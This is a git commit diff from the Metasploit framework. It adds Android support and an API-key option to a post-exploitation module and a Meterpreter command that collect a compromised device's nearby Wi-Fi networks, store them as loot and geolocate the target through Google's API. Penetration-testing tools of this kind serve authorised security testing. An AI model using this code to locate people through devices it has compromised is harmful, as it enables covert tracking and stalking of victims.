Land #10732, add api key for android wlan_geolocate
parent
d340eeecf9
commit
3ad5bd429a
|
@ -8,6 +8,7 @@
|
||||||
- Linux: `iwlist scanning`
|
- Linux: `iwlist scanning`
|
||||||
- Solaris: `dladm scan-wifi`
|
- Solaris: `dladm scan-wifi`
|
||||||
- BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"`
|
- BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"`
|
||||||
|
- Android: [WifiManager](https://developer.android.com/reference/android/net/wifi/WifiManager)
|
||||||
|
|
||||||
If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized.
|
If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized.
|
||||||
These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original
|
These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original
|
||||||
|
|
|
@ -385,7 +385,6 @@ class Console::CommandDispatcher::Android
|
||||||
end
|
end
|
||||||
|
|
||||||
def cmd_geolocate(*args)
|
def cmd_geolocate(*args)
|
||||||
|
|
||||||
generate_map = false
|
generate_map = false
|
||||||
geolocate_opts = Rex::Parser::Arguments.new(
|
geolocate_opts = Rex::Parser::Arguments.new(
|
||||||
'-h' => [ false, 'Help Banner' ],
|
'-h' => [ false, 'Help Banner' ],
|
||||||
|
@ -423,10 +422,8 @@ class Console::CommandDispatcher::Android
|
||||||
def cmd_dump_calllog(*args)
|
def cmd_dump_calllog(*args)
|
||||||
path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
|
path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
|
||||||
dump_calllog_opts = Rex::Parser::Arguments.new(
|
dump_calllog_opts = Rex::Parser::Arguments.new(
|
||||||
|
|
||||||
'-h' => [ false, 'Help Banner' ],
|
'-h' => [ false, 'Help Banner' ],
|
||||||
'-o' => [ true, 'Output path for call log']
|
'-o' => [ true, 'Output path for call log']
|
||||||
|
|
||||||
)
|
)
|
||||||
|
|
||||||
dump_calllog_opts.parse(args) do |opt, _idx, val|
|
dump_calllog_opts.parse(args) do |opt, _idx, val|
|
||||||
|
@ -565,19 +562,30 @@ class Console::CommandDispatcher::Android
|
||||||
|
|
||||||
def cmd_wlan_geolocate(*args)
|
def cmd_wlan_geolocate(*args)
|
||||||
wlan_geolocate_opts = Rex::Parser::Arguments.new(
|
wlan_geolocate_opts = Rex::Parser::Arguments.new(
|
||||||
'-h' => [ false, 'Help Banner' ]
|
'-h' => [ false, 'Help Banner' ],
|
||||||
|
'-a' => [ true, 'API key' ],
|
||||||
)
|
)
|
||||||
|
|
||||||
wlan_geolocate_opts.parse(args) do |opt, _idx, _val|
|
api_key = ''
|
||||||
|
wlan_geolocate_opts.parse(args) do |opt, _idx, val|
|
||||||
case opt
|
case opt
|
||||||
when '-h'
|
when '-h'
|
||||||
print_line('Usage: wlan_geolocate')
|
print_line('Usage: wlan_geolocate')
|
||||||
print_line('Tries to get device geolocation from WLAN information and Google\'s API')
|
print_line('Tries to get device geolocation from WLAN information and Google\'s API')
|
||||||
print_line(wlan_geolocate_opts.usage)
|
print_line(wlan_geolocate_opts.usage)
|
||||||
return
|
return
|
||||||
|
when '-a'
|
||||||
|
api_key = val
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if api_key.blank?
|
||||||
|
print_error("You must enter an api_key")
|
||||||
|
print_error("e.g. wlan_geolocate -a YOUR_API_KEY")
|
||||||
|
print_line(wlan_geolocate_opts.usage)
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
log = client.android.wlan_geolocate
|
log = client.android.wlan_geolocate
|
||||||
wlan_list = []
|
wlan_list = []
|
||||||
log.each do |x|
|
log.each do |x|
|
||||||
|
@ -592,9 +600,10 @@ class Console::CommandDispatcher::Android
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
g = Rex::Google::Geolocation.new
|
g = Rex::Google::Geolocation.new
|
||||||
|
g.set_api_key(api_key)
|
||||||
|
|
||||||
wlan_list.each do |wlan|
|
wlan_list.each do |wlan|
|
||||||
g.add_wlan(*wlan)
|
g.add_wlan(wlan[0], wlan[2]) # bssid, signalstrength
|
||||||
end
|
end
|
||||||
begin
|
begin
|
||||||
g.fetch!
|
g.fetch!
|
||||||
|
@ -602,7 +611,7 @@ class Console::CommandDispatcher::Android
|
||||||
print_error("Error: #{e}")
|
print_error("Error: #{e}")
|
||||||
else
|
else
|
||||||
print_status(g.to_s)
|
print_status(g.to_s)
|
||||||
print_status("Google Maps URL: #{g.google_maps_url}")
|
print_status("Google Maps URL: #{g.google_maps_url}")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post
|
||||||
performing a lookup against Google APIs.},
|
performing a lookup against Google APIs.},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [ 'Tom Sellers <tom[at]fadedcode.net>'],
|
'Author' => [ 'Tom Sellers <tom[at]fadedcode.net>'],
|
||||||
'Platform' => %w{ osx win linux bsd solaris },
|
'Platform' => %w{ android osx win linux bsd solaris },
|
||||||
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
||||||
))
|
))
|
||||||
|
|
||||||
|
@ -102,12 +102,10 @@ class MetasploitModule < Msf::Post
|
||||||
print_error("Error: #{e}")
|
print_error("Error: #{e}")
|
||||||
else
|
else
|
||||||
print_status(g.to_s)
|
print_status(g.to_s)
|
||||||
print_status("Google Maps URL: #{g.google_maps_url}")
|
print_status("Google Maps URL: #{g.google_maps_url}")
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# Run Method for when run command is issued
|
# Run Method for when run command is issued
|
||||||
def run
|
def run
|
||||||
case session.platform
|
case session.platform
|
||||||
|
@ -185,9 +183,31 @@ class MetasploitModule < Msf::Post
|
||||||
print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
|
print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
when 'android'
|
||||||
|
log = client.android.wlan_geolocate
|
||||||
|
listing = ''
|
||||||
|
wlan_list = []
|
||||||
|
log.each do |x|
|
||||||
|
mac = x['bssid']
|
||||||
|
ssid = x['ssid']
|
||||||
|
ss = x['level'].to_s
|
||||||
|
listing += "BSSID: #{mac}\n"
|
||||||
|
listing += "SSID: #{ssid}\n"
|
||||||
|
listing += "Strength: #{ss}\n\n"
|
||||||
|
wlan_list << [mac, ssid, ss]
|
||||||
|
end
|
||||||
|
if listing.blank?
|
||||||
|
print_error("Unable to generate wireless listing.")
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
store_loot("host.android.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
|
||||||
|
print_good("Target's wireless networks:\n\n#{listing}\n")
|
||||||
|
if datastore['GEOLOCATE']
|
||||||
|
perform_geolocation(wlan_list)
|
||||||
|
return
|
||||||
|
end
|
||||||
else
|
else
|
||||||
print_error("The target's platform, #{platform}, is not supported at this time.")
|
print_error("The target's platform, #{session.platform}, is not supported at this time.")
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue